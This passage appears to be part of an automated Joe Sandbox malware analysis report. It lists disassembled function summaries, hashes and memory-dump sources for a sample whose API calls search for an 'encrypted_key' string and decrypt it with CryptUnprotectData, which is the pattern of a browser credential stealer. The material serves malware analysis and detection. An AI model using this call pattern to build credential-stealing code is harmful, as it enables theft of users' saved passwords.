                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: c160aefa0f8d8db6d6c095141720b0cc5e0d7478421fe2fb68ff90c3f3c10686
                                • Instruction ID: 483662e5ef7acdde37faaaf3453255d88fc020a86aaf7da36ff7e4eae4ab8b71
                                • Opcode Fuzzy Hash: c160aefa0f8d8db6d6c095141720b0cc5e0d7478421fe2fb68ff90c3f3c10686
                                • Instruction Fuzzy Hash: 01512175D10148AADB14FBB8DC96EED7338EF54300F40C52AF81667291EE346A09DBB6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: f7ff5ae165f3f6ae56368b0b6c7b75cded71cede55172716c08751cc627a8588
                                • Instruction ID: c8fedc887b02fe5305083bee588f1846f92cb4bc18ef420763087b62d5a44162
                                • Opcode Fuzzy Hash: f7ff5ae165f3f6ae56368b0b6c7b75cded71cede55172716c08751cc627a8588
                                • Instruction Fuzzy Hash: BA410D71D10209AFCB04EFA9D845AFEBB78EF54304F048019E41666390DB75AA49CFB2
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DC9D39
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                  • Part of subcall function 00DC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                  • Part of subcall function 00DC9AC0: LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                  • Part of subcall function 00DC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DC9B84
                                  • Part of subcall function 00DC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DC9BA3
                                  • Part of subcall function 00DC9B60: LocalFree.KERNEL32(?), ref: 00DC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 69939f168fb7e18bd2885700a1efc3a117508aec1a61558fd9dc3d5fc8cda4f9
                                • Instruction ID: 1400dfa006df6a8ecb108fb10b356cb80c5ef434999eba5f1d1729cfe0fae741
                                • Opcode Fuzzy Hash: 69939f168fb7e18bd2885700a1efc3a117508aec1a61558fd9dc3d5fc8cda4f9
                                • Instruction Fuzzy Hash: 4A310DB5D1020AABCB14DBE4DC99FEEB7B8AB48304F144519E906A7241EB359A04CBB5
                                APIs
                                • CreateFileA.KERNEL32(00DD3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DD3AEE,?), ref: 00DD92FC
                                • GetFileSizeEx.KERNEL32(000000FF,00DD3AEE), ref: 00DD9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00DD9327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 192c4b5998c1387a9bdecfe1868fca892579f8ec032079e32480e50cf771cfdc
                                • Instruction ID: 37fee56337817650e231a3a9c1c5731c242daf96617c41b4ad4630e053de2799
                                • Opcode Fuzzy Hash: 192c4b5998c1387a9bdecfe1868fca892579f8ec032079e32480e50cf771cfdc
                                • Instruction Fuzzy Hash: B7F03C35F40308FBDB24DBB0DC59B9EB7B9AB48710F10C254B695A72C4D67696018B50
                                APIs
                                • __getptd.LIBCMT ref: 00DDC74E
                                  • Part of subcall function 00DDBF9F: __amsg_exit.LIBCMT ref: 00DDBFAF
                                • __getptd.LIBCMT ref: 00DDC765
                                • __amsg_exit.LIBCMT ref: 00DDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00DDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: f79c0e91622e1608852630ccc2b0bab39cc5b52209427afe28343600313249f2
                                • Instruction ID: 42a35fca20b1c98e020b6fd641c4501597d792bd86578a331ade9f965d40566a
                                • Opcode Fuzzy Hash: f79c0e91622e1608852630ccc2b0bab39cc5b52209427afe28343600313249f2
                                • Instruction Fuzzy Hash: 85F09032D14302EBDB31BBB8984675E33A0EF00739F25514BF404AA3D2DB646941DE76
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4F7A
                                • lstrcat.KERNEL32(?,00DE1070), ref: 00DD4F97
                                • lstrcat.KERNEL32(?,01629278), ref: 00DD4FAB
                                • lstrcat.KERNEL32(?,00DE1074), ref: 00DD4FBD
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD492C
                                  • Part of subcall function 00DD4910: FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                  • Part of subcall function 00DD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                  • Part of subcall function 00DD4910: FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 38881f8d2aba227cc6b056c2d6e6b9b41919e69219295f2377909997f8234804
                                • Instruction ID: c8fff3d2a17a2df1b030b609363f5c468d835147ef83866080971a15edb208e4
                                • Opcode Fuzzy Hash: 38881f8d2aba227cc6b056c2d6e6b9b41919e69219295f2377909997f8234804
                                • Instruction Fuzzy Hash: 7921887AA00308ABC765F760DC56EED333CEB54300F004559B69953185EE7597C98BB1